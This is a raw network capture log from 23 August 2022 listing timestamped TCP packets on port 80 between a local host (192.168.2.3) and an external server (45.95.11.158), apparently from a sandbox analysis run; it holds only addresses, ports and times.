Aug 23, 2022 18:24:04.606663942 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.606688023 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.606702089 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.606714964 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.606736898 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.607108116 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.607134104 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.607156992 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.607180119 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.607188940 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.607218027 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.607235909 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.607585907 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.607611895 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.607635975 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.607657909 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.607680082 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.607680082 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.607703924 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.607727051 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.607728004 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.607757092 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.607785940 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.607883930 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.607908964 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.607932091 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.607958078 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.608000040 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.608925104 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.608994961 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.622982979 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.623016119 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.623034000 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.623050928 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.623126984 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.623173952 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.623512983 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.623533964 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.623605013 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.624644041 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.624672890 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.624697924 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.624772072 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.624792099 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.624821901 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.624829054 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.624947071 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.624965906 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.624983072 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.624994993 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.625013113 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.625030041 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.625051022 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.625109911 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.636230946 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.636276960 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.636296034 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.636310101 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.636327982 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.636336088 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.636344910 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.636363983 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.636409044 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.636411905 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.636421919 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.636455059 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.636462927 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.636495113 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.636501074 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.636502981 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.636519909 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.636527061 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.636557102 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.636590004 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.636632919 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.636651039 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.636668921 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.636698008 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.636698008 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.636730909 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.636756897 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.641330004 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.641360998 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.641379118 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.641396046 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.641417027 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.641442060 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.641463041 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.641474009 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.641484976 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.641499043 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.641505957 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.641515017 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.641524076 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.641544104 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.641546965 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.641571999 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.641583920 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.641592026 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.641607046 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.641616106 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.641627073 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.641635895 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.641647100 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.641669989 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.641674995 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.641686916 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.641706944 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.641741037 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.651530981 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.651563883 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.651581049 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.651602030 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.651624918 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.651626110 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.651652098 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.651698112 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.651705027 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.651707888 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.651712894 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.651797056 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.651844025 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.651861906 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.651880980 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.651901960 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.651904106 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.651942015 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.651947021 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.651952982 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.651952982 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.652002096 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.653784037 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.654608965 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.659825087 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.659853935 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.659873009 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.659884930 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.659907103 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.659929037 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.660039902 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.660084963 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.660089970 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.660120010 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.660141945 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.660154104 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.660161972 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.660216093 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.660228014 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.660233021 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.660281897 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.660300016 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.660355091 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.661169052 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.661194086 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.661211014 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.661299944 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.661432981 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.661448956 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.661499977 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.661514044 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.668045998 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.668081045 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.668102980 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.668116093 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.668133020 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.668148994 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.668170929 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.668188095 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.668199062 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.668226957 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.668250084 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.668262959 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.668270111 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.668291092 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.668312073 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.668328047 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.668382883 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.668422937 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.668445110 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.668462038 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.668478012 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.668507099 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.668534040 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.668546915 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.668585062 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.668603897 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.669584036 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.669610023 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.669625998 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.669639111 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.669689894 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.669717073 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.678595066 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.678626060 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.678642035 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.678654909 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.678709984 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.678729057 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.678744078 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.678797007 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.678781986 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.678818941 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.678838015 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.678853035 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.678863049 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.678872108 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.678883076 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.678900003 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.678915024 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.678936958 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.678953886 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.678953886 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.678961039 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.678965092 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.678968906 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.678972006 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.678972960 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.678988934 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.679028034 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.679033041 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.679038048 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.691327095 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.691471100 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.691489935 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.691508055 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.691540003 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.691557884 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.691617966 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.691653967 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.695179939 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.695204973 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.695221901 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.695316076 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.695323944 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.695343018 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.695379972 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.695383072 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.695388079 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.695400953 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.695415974 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.695451021 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.695451975 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.695467949 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.695487976 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.695492029 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.695512056 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.695528030 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.695537090 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.695542097 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.695547104 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.695574045 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.695597887 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.695604086 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.695648909 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.695672989 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.695693016 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.695712090 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.695739985 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.695749998 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.695794106 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.695811987 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.695858955 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.696723938 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.696801901 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.699804068 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.699829102 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.699852943 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.699872017 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.699882030 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.699887991 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.699903965 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.699904919 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.699909925 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.699915886 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.699985981 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.700011015 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.700014114 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.700033903 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.700050116 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.700104952 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.700114965 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.700119972 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.700139046 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.700155973 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.700213909 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.700226068 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.700383902 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.700400114 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.700452089 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.700481892 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.701313972 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.701339960 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.701356888 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.701374054 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.701417923 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.701440096 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.710556984 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.710581064 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.710597992 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.710616112 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.710638046 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.710661888 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.710664988 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.710690975 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.710700989 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.710707903 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.710721970 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.710761070 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.710783958 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.710809946 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.710827112 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.710839033 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.710858107 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.710884094 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.711239100 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.711256981 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.711272955 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.711287975 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.711306095 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.711353064 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.711996078 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.712014914 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.712033033 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.712061882 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.712081909 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.712121964 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.712315083 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.712331057 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.712347031 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.712363958 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.712367058 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.712382078 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.712413073 CEST	49827	80	192.168.2.3	45.95.11.158
